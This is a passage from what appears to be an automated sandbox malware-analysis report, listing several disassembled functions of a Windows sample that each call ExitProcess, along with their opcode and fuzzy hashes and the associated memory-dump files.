                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID: Windows 95
                                                                                                                                              • API String ID: 621844428-1505401244
                                                                                                                                              • Opcode ID: 06ee5b3d2fc16acf124b33efc9de37e96a397455a9b7036738e288a6d516d034
                                                                                                                                              • Instruction ID: 91f151be12e34eefcece0535555c551b6786545de7eb143ac315b72f635cada5
                                                                                                                                              • Opcode Fuzzy Hash: 06ee5b3d2fc16acf124b33efc9de37e96a397455a9b7036738e288a6d516d034
                                                                                                                                              • Instruction Fuzzy Hash: BF11E5B2E041188EF7604A64DE44BFA75BAEBE0301F20817FE44AB15C4EB3D0ED68522
                                                                                                                                              Function 00408D22 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID: Windows 95
                                                                                                                                              • API String ID: 621844428-1505401244
                                                                                                                                              • Opcode ID: b83d9dad2a6c158be96d1e69bc9c1a3b76d9e51e126cb3a63bde19017aee412c
                                                                                                                                              • Instruction ID: 9756af19a8da1055843f120654c456da4387201b88b3d00ca56c5845746b4395
                                                                                                                                              • Opcode Fuzzy Hash: b83d9dad2a6c158be96d1e69bc9c1a3b76d9e51e126cb3a63bde19017aee412c
                                                                                                                                              • Instruction Fuzzy Hash: F61106B19001148EF7608A25DE44BBB767AEBD0310F20C2BBD84DB15C4DB3C0FD68922
                                                                                                                                              Function 00408E3B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID: Windows 95
                                                                                                                                              • API String ID: 621844428-1505401244
                                                                                                                                              • Opcode ID: 6d4f8bbf9da01e63885aab117a6982c7bd010285d059c4942f9c7a8494af099a
                                                                                                                                              • Instruction ID: 377b1287552c4201c3694d176e94097adba3da47ac4a77b2be544285f1439102
                                                                                                                                              • Opcode Fuzzy Hash: 6d4f8bbf9da01e63885aab117a6982c7bd010285d059c4942f9c7a8494af099a
                                                                                                                                              • Instruction Fuzzy Hash: 1C01D6F18042548FF7508A34DD447AB3B79EBC0314F2482BED40EA66C5C77D499ACE62
                                                                                                                                              Function 00409B44 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID: O9F_
                                                                                                                                              • API String ID: 621844428-2491346318
                                                                                                                                              • Opcode ID: 264cb0e2c088fb19869ac2c3948f2b91678a05936a8a1657452cec09c6e38fe6
                                                                                                                                              • Instruction ID: e2960921275b2b4cd9612f950d1ae373fda1593bcce3403b59f8bcfc46ae8f1c
                                                                                                                                              • Opcode Fuzzy Hash: 264cb0e2c088fb19869ac2c3948f2b91678a05936a8a1657452cec09c6e38fe6
                                                                                                                                              • Instruction Fuzzy Hash: 6FF0A9F2D042245BE7548600DC99EDF7638FB90724F2540B9D84D36380E6791FC1CA91
                                                                                                                                              Function 00408D81 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID: Windows 95
                                                                                                                                              • API String ID: 621844428-1505401244
                                                                                                                                              • Opcode ID: 2e4171a9dd523c1b565d793313d8689d3f46eb01583badc22c57eb070c073207
                                                                                                                                              • Instruction ID: 50075f126f50ca42df1adf15c636a1e18d7bccec036e41fb6c55c8ee5c780747
                                                                                                                                              • Opcode Fuzzy Hash: 2e4171a9dd523c1b565d793313d8689d3f46eb01583badc22c57eb070c073207
                                                                                                                                              • Instruction Fuzzy Hash: 60F0BBB19041544EF7504924DD48BAB3A76DBC0314F24C1BBD40DA59C9DB7D46DA8952
                                                                                                                                              Function 00408F70 Relevance: 1.6, APIs: 1, Instructions: 128COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 621844428-0
                                                                                                                                              • Opcode ID: 1952a7936c0133cbfde560b3d65e68ecd23dbfe18d21b3882dfbd8e159183bd1
                                                                                                                                              • Instruction ID: 28a30fba0cf0ee09651f58da81d84667316d1d37065a446d687b3b9cc59c00c5
                                                                                                                                              • Opcode Fuzzy Hash: 1952a7936c0133cbfde560b3d65e68ecd23dbfe18d21b3882dfbd8e159183bd1
                                                                                                                                              • Instruction Fuzzy Hash: D041E4B2D086189FF7248A24DC45BAB7766EB80304F1481BBD50E666C2D63D5EC6CE16
                                                                                                                                              Function 00408ED1 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 621844428-0
                                                                                                                                              • Opcode ID: f05c7cdd0c2a89594f47dbef6b61db932463086430597c7660979c7c10a5ab6b
                                                                                                                                              • Instruction ID: 882d15620eb7eecb2d0aa9dcd3cf1b034f2550b2a661cbfbfd18463f6c30bfe7
                                                                                                                                              • Opcode Fuzzy Hash: f05c7cdd0c2a89594f47dbef6b61db932463086430597c7660979c7c10a5ab6b
                                                                                                                                              • Instruction Fuzzy Hash: 6821D5B1D046189FEB218A34DC84BAB7778EB85314F1481BED50E66682D63C2E85CE16
                                                                                                                                              Function 00408F7B Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExitProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 621844428-0
                                                                                                                                              • Opcode ID: 393a5a6df8ca1fca4ab286b25fa4b899f39e5161d627bd1ae29fc664769e89ef
                                                                                                                                              • Instruction ID: bc008174fa5c8c00d50f4e6e7ef79aefa11b1a91fc4689ab148c9eb7b5df80ae
                                                                                                                                              • Opcode Fuzzy Hash: 393a5a6df8ca1fca4ab286b25fa4b899f39e5161d627bd1ae29fc664769e89ef
                                                                                                                                              • Instruction Fuzzy Hash: 6E21F8B1D042148BF7248A24CC447AA7779EBC0304F1081BBD50E662C1DB3C1EC6CE15
                                                                                                                                              Function 00408FFE Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ExitProcess.KERNEL32(00000000,00409BD3,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409F62
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
